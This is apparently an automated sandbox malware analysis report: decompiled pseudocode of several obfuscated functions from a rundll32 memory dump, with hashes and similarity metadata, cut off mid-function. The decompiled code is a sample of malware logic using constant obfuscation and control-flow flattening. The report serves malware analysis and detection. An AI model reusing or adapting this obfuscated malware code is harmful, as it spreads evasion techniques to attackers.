                                                                                                                                                            0x00386b1e
                                                                                                                                                            0x00386b2f
                                                                                                                                                            0x00386b34
                                                                                                                                                            0x00386b47
                                                                                                                                                            0x00386b6a
                                                                                                                                                            0x00386b7c
                                                                                                                                                            0x00386b81
                                                                                                                                                            0x00386b84
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00386a88
                                                                                                                                                            0x00386a8e
                                                                                                                                                            0x00386b06
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00386a90
                                                                                                                                                            0x00386a90
                                                                                                                                                            0x00386a92
                                                                                                                                                            0x00386a98
                                                                                                                                                            0x00386aa1
                                                                                                                                                            0x00386aa9
                                                                                                                                                            0x00386aba
                                                                                                                                                            0x00386ad2
                                                                                                                                                            0x00386ae5
                                                                                                                                                            0x00386af7
                                                                                                                                                            0x00386afc
                                                                                                                                                            0x00386aff
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00386aff
                                                                                                                                                            0x00386a92
                                                                                                                                                            0x00386a8e
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00386a82
                                                                                                                                                            0x00386b8e
                                                                                                                                                            0x00386b99
                                                                                                                                                            0x00386b9a
                                                                                                                                                            0x00386ba9
                                                                                                                                                            0x00386bae
                                                                                                                                                            0x00386bb1
                                                                                                                                                            0x00386bb3
                                                                                                                                                            0x00386bb3
                                                                                                                                                            0x00386bb3
                                                                                                                                                            0x00386bc5

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: <E$?c3$Md$a@$yw
                                                                                                                                                            • API String ID: 0-2084988834
                                                                                                                                                            • Opcode ID: 86b9b092eb5d4aeab04b6e7f3bcdffec34cc413377859b2fe43d1d08c56de928
                                                                                                                                                            • Instruction ID: 9b35b840189377bb70c25cbf8302c9dda9cbf417d48d77605f0ac00ae74e4b60
                                                                                                                                                            • Opcode Fuzzy Hash: 86b9b092eb5d4aeab04b6e7f3bcdffec34cc413377859b2fe43d1d08c56de928
                                                                                                                                                            • Instruction Fuzzy Hash: 36C120B24083809FD369DF25D58A81BBBF2FBD4758F108A1DF5A596260D3B98909CF43
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                            			E00380001(void* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                                            				char _v128;
                                                                                                                                                            				signed int _v132;
                                                                                                                                                            				intOrPtr _v136;
                                                                                                                                                            				intOrPtr _v140;
                                                                                                                                                            				char _v144;
                                                                                                                                                            				signed int _v148;
                                                                                                                                                            				signed int _v152;
                                                                                                                                                            				signed int _v156;
                                                                                                                                                            				signed int _v160;
                                                                                                                                                            				signed int _v164;
                                                                                                                                                            				signed int _v168;
                                                                                                                                                            				signed int _v172;
                                                                                                                                                            				signed int _v176;
                                                                                                                                                            				signed int _v180;
                                                                                                                                                            				signed int _v184;
                                                                                                                                                            				signed int _v188;
                                                                                                                                                            				signed int _v192;
                                                                                                                                                            				signed int _v196;
                                                                                                                                                            				signed int _v200;
                                                                                                                                                            				signed int _v204;
                                                                                                                                                            				void* _t154;
                                                                                                                                                            				void* _t174;
                                                                                                                                                            				char _t178;
                                                                                                                                                            				void* _t183;
                                                                                                                                                            				char* _t189;
                                                                                                                                                            				void* _t209;
                                                                                                                                                            				signed int _t210;
                                                                                                                                                            				signed int _t211;
                                                                                                                                                            				signed int _t212;
                                                                                                                                                            				signed int _t213;
                                                                                                                                                            				signed int _t214;
                                                                                                                                                            				signed int _t215;
                                                                                                                                                            				signed int _t216;
                                                                                                                                                            				signed int* _t220;
                                                                                                                                                            
                                                                                                                                                            				_push(_a4);
                                                                                                                                                            				_t209 = __edx;
                                                                                                                                                            				_push(__edx);
                                                                                                                                                            				_push(__ecx);
                                                                                                                                                            				E003820B9(_t154);
                                                                                                                                                            				_v132 = _v132 & 0x00000000;
                                                                                                                                                            				_t220 =  &(( &_v204)[3]);
                                                                                                                                                            				_v140 = 0x6f537b;
                                                                                                                                                            				_v136 = 0x2895cf;
                                                                                                                                                            				_t183 = 0xf669bfa;
                                                                                                                                                            				_v164 = 0xc3509d;
                                                                                                                                                            				_v164 = _v164 >> 0xf;
                                                                                                                                                            				_v164 = _v164 ^ 0x0007728b;
                                                                                                                                                            				_v188 = 0x58efa0;
                                                                                                                                                            				_v188 = _v188 + 0xffff9444;
                                                                                                                                                            				_t210 = 0x2f;
                                                                                                                                                            				_v188 = _v188 / _t210;
                                                                                                                                                            				_v188 = _v188 ^ 0x000ac4b2;
                                                                                                                                                            				_v176 = 0xa783cc;
                                                                                                                                                            				_v176 = _v176 << 0xa;
                                                                                                                                                            				_v176 = _v176 ^ 0x73295065;
                                                                                                                                                            				_v176 = _v176 ^ 0xed239367;
                                                                                                                                                            				_v148 = 0x42262a;
                                                                                                                                                            				_v148 = _v148 | 0x228e56d6;
                                                                                                                                                            				_v148 = _v148 ^ 0x22cd87d0;
                                                                                                                                                            				_v204 = 0xc47428;
                                                                                                                                                            				_v204 = _v204 + 0xffff2e33;
                                                                                                                                                            				_v204 = _v204 + 0xffff2fa2;
                                                                                                                                                            				_v204 = _v204 + 0xffff28a7;
                                                                                                                                                            				_v204 = _v204 ^ 0x00c63754;
                                                                                                                                                            				_v156 = 0x11bd56;
                                                                                                                                                            				_t211 = 0x5c;
                                                                                                                                                            				_v156 = _v156 * 0x6a;
                                                                                                                                                            				_v156 = _v156 ^ 0x0752342f;
                                                                                                                                                            				_v172 = 0x489beb;
                                                                                                                                                            				_v172 = _v172 + 0xfe21;
                                                                                                                                                            				_v172 = _v172 / _t211;
                                                                                                                                                            				_v172 = _v172 ^ 0x0000a4d4;
                                                                                                                                                            				_v192 = 0x2e5859;
                                                                                                                                                            				_v192 = _v192 ^ 0x83ba67d9;
                                                                                                                                                            				_t212 = 0x44;
                                                                                                                                                            				_v192 = _v192 / _t212;
                                                                                                                                                            				_v192 = _v192 ^ 0x01e00d99;
                                                                                                                                                            				_v180 = 0x89bc6d;
                                                                                                                                                            				_v180 = _v180 | 0xb1d25d45;
                                                                                                                                                            				_v180 = _v180 << 0xe;
                                                                                                                                                            				_v180 = _v180 ^ 0xff5cc309;
                                                                                                                                                            				_v168 = 0x19805c;
                                                                                                                                                            				_t213 = 0x18;
                                                                                                                                                            				_v168 = _v168 * 0x16;
                                                                                                                                                            				_v168 = _v168 ^ 0x4d2845a5;
                                                                                                                                                            				_v168 = _v168 ^ 0x4f1adce1;
                                                                                                                                                            				_v196 = 0x9cfdcd;
                                                                                                                                                            				_v196 = _v196 / _t213;
                                                                                                                                                            				_v196 = _v196 + 0xd8a6;
                                                                                                                                                            				_v196 = _v196 ^ 0x0005e56c;
                                                                                                                                                            				_v200 = 0x1d77da;
                                                                                                                                                            				_t214 = 0x6b;
                                                                                                                                                            				_v200 = _v200 / _t214;
                                                                                                                                                            				_t215 = 9;
                                                                                                                                                            				_v200 = _v200 / _t215;
                                                                                                                                                            				_t216 = 0x59;
                                                                                                                                                            				_v200 = _v200 / _t216;
                                                                                                                                                            				_v200 = _v200 ^ 0x00052bad;
                                                                                                                                                            				_v184 = 0x474669;
                                                                                                                                                            				_v184 = _v184 * 0x25;
                                                                                                                                                            				_v184 = _v184 + 0xffff8141;
                                                                                                                                                            				_v184 = _v184 ^ 0x0a4cf000;
                                                                                                                                                            				_v160 = 0x98ddfb;
                                                                                                                                                            				_v160 = _v160 << 3;
                                                                                                                                                            				_v160 = _v160 ^ 0x04cf55b1;
                                                                                                                                                            				_v152 = 0xbbc225;
                                                                                                                                                            				_v152 = _v152 * 0x58;
                                                                                                                                                            				_v152 = _v152 ^ 0x408ec409;
                                                                                                                                                            				while(_t183 != 0x4a2a3c4) {
                                                                                                                                                            					if(_t183 == 0x640e5f9) {
                                                                                                                                                            						__eflags = _v128;
                                                                                                                                                            						_t189 =  &_v128;
                                                                                                                                                            						while(__eflags != 0) {
                                                                                                                                                            							_t178 =  *_t189;
                                                                                                                                                            							__eflags = _t178 - 0x30;
                                                                                                                                                            							if(_t178 < 0x30) {
                                                                                                                                                            								L10:
                                                                                                                                                            								__eflags = _t178 - 0x61;
                                                                                                                                                            								if(_t178 < 0x61) {
                                                                                                                                                            									L12:
                                                                                                                                                            									__eflags = _t178 - 0x41;
                                                                                                                                                            									if(_t178 < 0x41) {
                                                                                                                                                            										L14:
                                                                                                                                                            										 *_t189 = 0x58;
                                                                                                                                                            									} else {
                                                                                                                                                            										__eflags = _t178 - 0x5a;
                                                                                                                                                            										if(_t178 > 0x5a) {
                                                                                                                                                            											goto L14;
                                                                                                                                                            										}
                                                                                                                                                            									}
                                                                                                                                                            								} else {
                                                                                                                                                            									__eflags = _t178 - 0x7a;
                                                                                                                                                            									if(_t178 > 0x7a) {
                                                                                                                                                            										goto L12;
                                                                                                                                                            									}
                                                                                                                                                            								}
                                                                                                                                                            							} else {
                                                                                                                                                            								__eflags = _t178 - 0x39;
                                                                                                                                                            								if(_t178 > 0x39) {
                                                                                                                                                            									goto L10;
                                                                                                                                                            								}
                                                                                                                                                            							}
                                                                                                                                                            							_t189 = _t189 + 1;
                                                                                                                                                            							__eflags =  *_t189;
                                                                                                                                                            						}
                                                                                                                                                            						_t183 = 0x4a2a3c4;
                                                                                                                                                            						continue;
                                                                                                                                                            					} else {
                                                                                                                                                            						if(_t183 == 0x7562914) {
                                                                                                                                                            							_v144 = 0x80;
                                                                                                                                                            							_t178 = E0037CD29(_v164,  &_v144, _v176,  &_v128);
                                                                                                                                                            							_t220 =  &(_t220[3]);
                                                                                                                                                            							_t183 = 0x640e5f9;
                                                                                                                                                            							continue;
                                                                                                                                                            						} else {
                                                                                                                                                            							if(_t183 == 0xf669bfa) {
                                                                                                                                                            								_t183 = 0x7562914;
                                                                                                                                                            								continue;
                                                                                                                                                            							}
                                                                                                                                                            						}
                                                                                                                                                            					}
                                                                                                                                                            					L18:
                                                                                                                                                            					__eflags = _t183 - 0x1718ff4;
                                                                                                                                                            					if(__eflags != 0) {
                                                                                                                                                            						continue;
                                                                                                                                                            					}
                                                                                                                                                            					return _t178;
                                                                                                                                                            				}
                                                                                                                                                            				_push(_v172);
                                                                                                                                                            				_push(_v156);
                                                                                                                                                            				_push(_v204);
                                                                                                                                                            				_t174 = E00388606(_v148, 0x371690, __eflags);
                                                                                                                                                            				E00372206( &_v128, _t209, _v196, _v200, _t174, E0037EE81(__eflags), _v184);
                                                                                                                                                            				_t178 = E0037A8B0(_v160, _t174, _v152);
                                                                                                                                                            				_t220 =  &(_t220[0xb]);
                                                                                                                                                            				_t183 = 0x1718ff4;
                                                                                                                                                            				goto L18;
                                                                                                                                                            			}





































                                                                                                                                                            0x00380233
                                                                                                                                                            0x0038023d
                                                                                                                                                            0x00380280
                                                                                                                                                            0x00380285
                                                                                                                                                            0x00380289
                                                                                                                                                            0x0038028b
                                                                                                                                                            0x0038028d
                                                                                                                                                            0x0038028f
                                                                                                                                                            0x00380295
                                                                                                                                                            0x00380295
                                                                                                                                                            0x00380297
                                                                                                                                                            0x0038029d
                                                                                                                                                            0x0038029d
                                                                                                                                                            0x0038029f
                                                                                                                                                            0x003802a5
                                                                                                                                                            0x003802a5
                                                                                                                                                            0x003802a1
                                                                                                                                                            0x003802a1
                                                                                                                                                            0x003802a3
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003802a3
                                                                                                                                                            0x00380299
                                                                                                                                                            0x00380299
                                                                                                                                                            0x0038029b
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038029b
                                                                                                                                                            0x00380291
                                                                                                                                                            0x00380291
                                                                                                                                                            0x00380293
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00380293
                                                                                                                                                            0x003802a8
                                                                                                                                                            0x003802a9
                                                                                                                                                            0x003802a9
                                                                                                                                                            0x003802ae
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038023f
                                                                                                                                                            0x00380241
                                                                                                                                                            0x00380257
                                                                                                                                                            0x00380271
                                                                                                                                                            0x00380276
                                                                                                                                                            0x00380279
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00380243
                                                                                                                                                            0x00380249
                                                                                                                                                            0x0038024f
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038024f
                                                                                                                                                            0x00380249
                                                                                                                                                            0x00380241
                                                                                                                                                            0x0038030f
                                                                                                                                                            0x0038030f
                                                                                                                                                            0x00380315
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00380325
                                                                                                                                                            0x00380325
                                                                                                                                                            0x003802b2
                                                                                                                                                            0x003802bb
                                                                                                                                                            0x003802bf
                                                                                                                                                            0x003802c7
                                                                                                                                                            0x003802f3
                                                                                                                                                            0x00380302
                                                                                                                                                            0x00380307
                                                                                                                                                            0x0038030a
                                                                                                                                                            0x00000000

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: *&B$YX.$eP)s$iFG${So
                                                                                                                                                            • API String ID: 0-3810143839
                                                                                                                                                            • Opcode ID: 381a4665687bc05ff23667a00f7f424c7d21d38b86bd3323ec0aa08e6c6dd8e0
                                                                                                                                                            • Instruction ID: e983eb00e9cf312eccb3966939f8b987ca2af5f82d65bf8adfd9eda62407b57a
                                                                                                                                                            • Opcode Fuzzy Hash: 381a4665687bc05ff23667a00f7f424c7d21d38b86bd3323ec0aa08e6c6dd8e0
                                                                                                                                                            • Instruction Fuzzy Hash: 0081A5B15093409BD3A8DF25D589A1FBBE2BBC5718F00995DF1C99A260D3B8C949CF83
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 90%
                                                                                                                                                            			E00377735(void* __edx, intOrPtr _a4, signed int* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                            				char _v44;
                                                                                                                                                            				void* _v56;
                                                                                                                                                            				intOrPtr _v60;
                                                                                                                                                            				signed int _v64;
                                                                                                                                                            				signed int _v68;
                                                                                                                                                            				signed int _v72;
                                                                                                                                                            				signed int _v76;
                                                                                                                                                            				signed int _v80;
                                                                                                                                                            				signed int _v84;
                                                                                                                                                            				signed int _v88;
                                                                                                                                                            				signed int _v92;
                                                                                                                                                            				signed int _v96;
                                                                                                                                                            				signed int _v100;
                                                                                                                                                            				signed int _v104;
                                                                                                                                                            				signed int _v108;
                                                                                                                                                            				unsigned int _v112;
                                                                                                                                                            				unsigned int _v116;
                                                                                                                                                            				signed int _v120;
                                                                                                                                                            				signed int _v124;
                                                                                                                                                            				signed int _v128;
                                                                                                                                                            				signed int _v132;
                                                                                                                                                            				signed int _v136;
                                                                                                                                                            				void* __ecx;
                                                                                                                                                            				void* _t163;
                                                                                                                                                            				signed int _t176;
                                                                                                                                                            				void* _t188;
                                                                                                                                                            				signed int _t205;
                                                                                                                                                            				signed int* _t207;
                                                                                                                                                            				void* _t209;
                                                                                                                                                            				void* _t210;
                                                                                                                                                            
                                                                                                                                                            				_t186 = _a4;
                                                                                                                                                            				_t207 = _a8;
                                                                                                                                                            				_push(_a16);
                                                                                                                                                            				_push(_a12);
                                                                                                                                                            				_push(_t207);
                                                                                                                                                            				_push(_a4);
                                                                                                                                                            				_push(__edx);
                                                                                                                                                            				E003820B9(_t163);
                                                                                                                                                            				_v60 = 0x524796;
                                                                                                                                                            				_t210 = _t209 + 0x18;
                                                                                                                                                            				asm("stosd");
                                                                                                                                                            				_t188 = 0x9c25eae;
                                                                                                                                                            				asm("stosd");
                                                                                                                                                            				asm("stosd");
                                                                                                                                                            				_v76 = 0x29f01;
                                                                                                                                                            				_v76 = _v76 | 0x94be009d;
                                                                                                                                                            				_v76 = _v76 ^ 0x94be9f9d;
                                                                                                                                                            				_v108 = 0xafa956;
                                                                                                                                                            				_v108 = _v108 + 0x628;
                                                                                                                                                            				_v108 = _v108 ^ 0xf539d3de;
                                                                                                                                                            				_v108 = _v108 ^ 0xf5927b2e;
                                                                                                                                                            				_v92 = 0x300c11;
                                                                                                                                                            				_v92 = _v92 ^ 0x95f7d427;
                                                                                                                                                            				_v92 = _v92 ^ 0x95c19bc8;
                                                                                                                                                            				_v116 = 0x7fd72e;
                                                                                                                                                            				_v116 = _v116 >> 0x10;
                                                                                                                                                            				_v116 = _v116 + 0x5d9b;
                                                                                                                                                            				_v116 = _v116 ^ 0x0001fda4;
                                                                                                                                                            				_v88 = 0x25a82f;
                                                                                                                                                            				_t205 = 0x1b;
                                                                                                                                                            				_v88 = _v88 * 0x72;
                                                                                                                                                            				_v88 = _v88 ^ 0x10cad58f;
                                                                                                                                                            				_v100 = 0xf91ce5;
                                                                                                                                                            				_v100 = _v100 >> 0xc;
                                                                                                                                                            				_v100 = _v100 ^ 0x71d91e41;
                                                                                                                                                            				_v100 = _v100 ^ 0x71d9c87d;
                                                                                                                                                            				_v136 = 0x5a524;
                                                                                                                                                            				_v136 = _v136 ^ 0x65d544fc;
                                                                                                                                                            				_v136 = _v136 / _t205;
                                                                                                                                                            				_v136 = _v136 + 0xdad4;
                                                                                                                                                            				_v136 = _v136 ^ 0x03c43220;
                                                                                                                                                            				_v68 = 0xd5537a;
                                                                                                                                                            				_v68 = _v68 + 0xffffd52f;
                                                                                                                                                            				_v68 = _v68 ^ 0x00d2b66c;
                                                                                                                                                            				_v128 = 0x59397b;
                                                                                                                                                            				_v128 = _v128 ^ 0x5dfc0cc3;
                                                                                                                                                            				_v128 = _v128 + 0x56f6;
                                                                                                                                                            				_v128 = _v128 + 0xff83;
                                                                                                                                                            				_v128 = _v128 ^ 0x5dafd3d4;
                                                                                                                                                            				_v104 = 0x85edfa;
                                                                                                                                                            				_v104 = _v104 | 0x32b3baf7;
                                                                                                                                                            				_v104 = _v104 ^ 0x32b12396;
                                                                                                                                                            				_v112 = 0x4c4fc6;
                                                                                                                                                            				_v112 = _v112 + 0xbf9f;
                                                                                                                                                            				_v112 = _v112 >> 1;
                                                                                                                                                            				_v112 = _v112 ^ 0x002f2047;
                                                                                                                                                            				_v120 = 0xc21a43;
                                                                                                                                                            				_v120 = _v120 | 0x0781619f;
                                                                                                                                                            				_v120 = _v120 ^ 0x30a197e6;
                                                                                                                                                            				_v120 = _v120 ^ 0x376a3e6d;
                                                                                                                                                            				_v84 = 0xaf6a80;
                                                                                                                                                            				_v84 = _v84 + 0xffff12f3;
                                                                                                                                                            				_v84 = _v84 ^ 0x00ae6f5f;
                                                                                                                                                            				_v64 = 0x7bdfb0;
                                                                                                                                                            				_v64 = _v64 >> 2;
                                                                                                                                                            				_v64 = _v64 ^ 0x00114c08;
                                                                                                                                                            				_v96 = 0x6b35de;
                                                                                                                                                            				_v96 = _v96 * 0x60;
                                                                                                                                                            				_v96 = _v96 ^ 0x283b6418;
                                                                                                                                                            				_v124 = 0x52b9d2;
                                                                                                                                                            				_v124 = _v124 | 0x40c5122c;
                                                                                                                                                            				_v124 = _v124 << 8;
                                                                                                                                                            				_v124 = _v124 >> 0x10;
                                                                                                                                                            				_v124 = _v124 ^ 0x0001910d;
                                                                                                                                                            				_v132 = 0x44d0f9;
                                                                                                                                                            				_v132 = _v132 * 0x29;
                                                                                                                                                            				_v132 = _v132 + 0xf17;
                                                                                                                                                            				_v132 = _v132 * 0x65;
                                                                                                                                                            				_v132 = _v132 ^ 0x592f3fb2;
                                                                                                                                                            				_v72 = 0xc75ad6;
                                                                                                                                                            				_v72 = _v72 ^ 0xe0bef3a1;
                                                                                                                                                            				_v72 = _v72 ^ 0xe072572c;
                                                                                                                                                            				_v80 = 0xa6c1d6;
                                                                                                                                                            				_v80 = _v80 + 0xc8d;
                                                                                                                                                            				_v80 = _v80 ^ 0x00ac29a9;
                                                                                                                                                            				do {
                                                                                                                                                            					while(_t188 != 0xe27b71) {
                                                                                                                                                            						if(_t188 == 0x372e88b) {
                                                                                                                                                            							_push(_t188);
                                                                                                                                                            							_push(_t188);
                                                                                                                                                            							_t176 = E00377FF2(_t207[1]);
                                                                                                                                                            							 *_t207 = _t176;
                                                                                                                                                            							__eflags = _t176;
                                                                                                                                                            							if(__eflags != 0) {
                                                                                                                                                            								_t188 = 0xe27b71;
                                                                                                                                                            								continue;
                                                                                                                                                            							}
                                                                                                                                                            						} else {
                                                                                                                                                            							if(_t188 == 0x93f98fe) {
                                                                                                                                                            								_t207[1] = E00390C14(_t186);
                                                                                                                                                            								_t188 = 0x372e88b;
                                                                                                                                                            								continue;
                                                                                                                                                            							} else {
                                                                                                                                                            								if(_t188 == 0x9c25eae) {
                                                                                                                                                            									_t188 = 0x93f98fe;
                                                                                                                                                            									 *_t207 =  *_t207 & 0x00000000;
                                                                                                                                                            									_t207[1] = _v76;
                                                                                                                                                            									continue;
                                                                                                                                                            								} else {
                                                                                                                                                            									if(_t188 == 0xa0c9f29) {
                                                                                                                                                            										_t146 =  &_v112; // 0x2f2047
                                                                                                                                                            										E00380DAF(_v68,  &_v44, _v128,  *((intOrPtr*)(_t186 + 0x48)), _v104,  *_t146);
                                                                                                                                                            										_t210 = _t210 + 0x10;
                                                                                                                                                            										_t188 = 0xc7f60b3;
                                                                                                                                                            										continue;
                                                                                                                                                            									} else {
                                                                                                                                                            										if(_t188 == 0xc7f60b3) {
                                                                                                                                                            											_t144 =  &_v84; // 0xe072572c
                                                                                                                                                            											E00390E3A( &_v44, _v120, __eflags,  *_t144, _v64, _v96, _t186 + 0x14);
                                                                                                                                                            											_t210 = _t210 + 0x10;
                                                                                                                                                            											_t188 = 0xcf8cba1;
                                                                                                                                                            											continue;
                                                                                                                                                            										} else {
                                                                                                                                                            											_t219 = _t188 - 0xcf8cba1;
                                                                                                                                                            											if(_t188 != 0xcf8cba1) {
                                                                                                                                                            												goto L17;
                                                                                                                                                            											} else {
                                                                                                                                                            												E00390E3A( &_v44, _v124, _t219, _v132, _v72, _v80, _t186 + 0x38);
                                                                                                                                                            											}
                                                                                                                                                            										}
                                                                                                                                                            									}
                                                                                                                                                            								}
                                                                                                                                                            							}
                                                                                                                                                            						}
                                                                                                                                                            						L9:
                                                                                                                                                            						return 0 |  *_t207 != 0x00000000;
                                                                                                                                                            					}
                                                                                                                                                            					E00373DBC( &_v44, _t207, _v88, _v100, _v136);
                                                                                                                                                            					_t210 = _t210 + 0xc;
                                                                                                                                                            					_t188 = 0xa0c9f29;
                                                                                                                                                            					L17:
                                                                                                                                                            					__eflags = _t188 - 0x560a718;
                                                                                                                                                            				} while (__eflags != 0);
                                                                                                                                                            				goto L9;
                                                                                                                                                            			}
                                                                                                                                                            0x00377a90
                                                                                                                                                            0x00377a93
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003779cb
                                                                                                                                                            0x003779d1
                                                                                                                                                            0x00377a7c
                                                                                                                                                            0x00377a7e
                                                                                                                                                            0x00377a81
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003779d7
                                                                                                                                                            0x003779dd
                                                                                                                                                            0x00377a4f
                                                                                                                                                            0x00377a66
                                                                                                                                                            0x00377a6b
                                                                                                                                                            0x00377a6e
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003779df
                                                                                                                                                            0x003779e5
                                                                                                                                                            0x00377a35
                                                                                                                                                            0x00377a3d
                                                                                                                                                            0x00377a42
                                                                                                                                                            0x00377a45
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003779e7
                                                                                                                                                            0x003779e7
                                                                                                                                                            0x003779ed
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003779f3
                                                                                                                                                            0x00377a0b
                                                                                                                                                            0x00377a10
                                                                                                                                                            0x003779ed
                                                                                                                                                            0x003779e5
                                                                                                                                                            0x003779dd
                                                                                                                                                            0x003779d1
                                                                                                                                                            0x003779c5
                                                                                                                                                            0x00377a13
                                                                                                                                                            0x00377a24
                                                                                                                                                            0x00377a24
                                                                                                                                                            0x00377ad8
                                                                                                                                                            0x00377add
                                                                                                                                                            0x00377ae0
                                                                                                                                                            0x00377ae5
                                                                                                                                                            0x00377ae5
                                                                                                                                                            0x00377ae5
                                                                                                                                                            0x00000000

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: ,Wr$G /$m>j7$q{${9Y
                                                                                                                                                            • API String ID: 0-2956538602
                                                                                                                                                            • Opcode ID: aad4c5470bf923e8e08ddaad0ee87e401980107f56092e5079a3be882124f178
                                                                                                                                                            • Instruction ID: 017bff9f0eb2ed6ccd02224880146e9eb9330d2b001f741631b12309fec3bfe6
                                                                                                                                                            • Opcode Fuzzy Hash: aad4c5470bf923e8e08ddaad0ee87e401980107f56092e5079a3be882124f178
                                                                                                                                                            • Instruction Fuzzy Hash: D9913D710093419FD7A9CF65DA8692BBBF1FBC4708F10991DF29696220D3B98A49CF43
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 91%
                                                                                                                                                            			E00374816(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                            				signed int _v4;
                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                            				intOrPtr _v16;
                                                                                                                                                            				char _v20;
                                                                                                                                                            				signed int _v24;
                                                                                                                                                            				signed int _v28;
                                                                                                                                                            				signed int _v32;
                                                                                                                                                            				signed int _v36;
                                                                                                                                                            				signed int _v40;
                                                                                                                                                            				signed int _v44;
                                                                                                                                                            				signed int _v48;
                                                                                                                                                            				signed int _v52;
                                                                                                                                                            				signed int _v56;
                                                                                                                                                            				signed int _v60;
                                                                                                                                                            				signed int _v64;
                                                                                                                                                            				signed int _v68;
                                                                                                                                                            				signed int _v72;
                                                                                                                                                            				signed int _v76;
                                                                                                                                                            				signed int _v80;
                                                                                                                                                            				signed int _v84;
                                                                                                                                                            				signed int _v88;
                                                                                                                                                            				void* _t164;
                                                                                                                                                            				void* _t179;
                                                                                                                                                            				signed int _t190;
                                                                                                                                                            				signed int _t191;
                                                                                                                                                            				signed int _t192;
                                                                                                                                                            				signed int _t193;
                                                                                                                                                            				void* _t196;
                                                                                                                                                            				void* _t213;
                                                                                                                                                            				void* _t214;
                                                                                                                                                            				signed int* _t217;
                                                                                                                                                            
                                                                                                                                                            				_push(_a16);
                                                                                                                                                            				_t213 = __edx;
                                                                                                                                                            				_push(_a12);
                                                                                                                                                            				_push(_a8);
                                                                                                                                                            				_push(_a4);
                                                                                                                                                            				_push(__edx);
                                                                                                                                                            				_push(__ecx);
                                                                                                                                                            				E003820B9(_t164);
                                                                                                                                                            				_v4 = _v4 & 0x00000000;
                                                                                                                                                            				_t217 =  &(( &_v88)[6]);
                                                                                                                                                            				_v16 = 0xc0a747;
                                                                                                                                                            				_v12 = 0xade381;
                                                                                                                                                            				_t214 = 0;
                                                                                                                                                            				_v8 = 0x11050f;
                                                                                                                                                            				_t196 = 0x5adc597;
                                                                                                                                                            				_v84 = 0xdf9e69;
                                                                                                                                                            				_v84 = _v84 >> 2;
                                                                                                                                                            				_v84 = _v84 + 0xffff5795;
                                                                                                                                                            				_v84 = _v84 >> 5;
                                                                                                                                                            				_v84 = _v84 ^ 0x0001b9f8;
                                                                                                                                                            				_v68 = 0xf2d8cd;
                                                                                                                                                            				_v68 = _v68 << 6;
                                                                                                                                                            				_v68 = _v68 | 0xe3b79c6a;
                                                                                                                                                            				_v68 = _v68 + 0xec5a;
                                                                                                                                                            				_v68 = _v68 ^ 0xffb8abc5;
                                                                                                                                                            				_v40 = 0x5d8c34;
                                                                                                                                                            				_v40 = _v40 >> 9;
                                                                                                                                                            				_v40 = _v40 ^ 0x40002ec6;
                                                                                                                                                            				_v28 = 0x37ca39;
                                                                                                                                                            				_v28 = _v28 | 0x456668c2;
                                                                                                                                                            				_v28 = _v28 ^ 0x0577eafb;
                                                                                                                                                            				_v80 = 0xd16358;
                                                                                                                                                            				_v80 = _v80 ^ 0xe637ce9d;
